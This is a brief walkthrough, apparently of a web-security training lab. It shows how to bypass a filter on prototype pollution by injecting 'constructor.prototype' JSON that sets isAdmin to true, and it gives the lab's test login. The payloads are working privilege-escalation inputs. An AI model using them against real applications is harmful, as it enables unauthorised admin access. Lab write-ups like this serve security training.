Login like usual with the given credentials::
wiener:peter
Submit, inspect the request and forward to Repeater
I'm going to assume the normal method of polluting the prototype is filtered. Let's try bypassing this using the constructor property
constructor
Send the request
Great, that worked. Now just change the value of isAdmin to true
isAdmin
true
Last updated 9 months ago
"constructor":{ "prototype":{ "foo":"bar" } }
"constructor":{ "prototype":{ "isAdmin":"true" } }
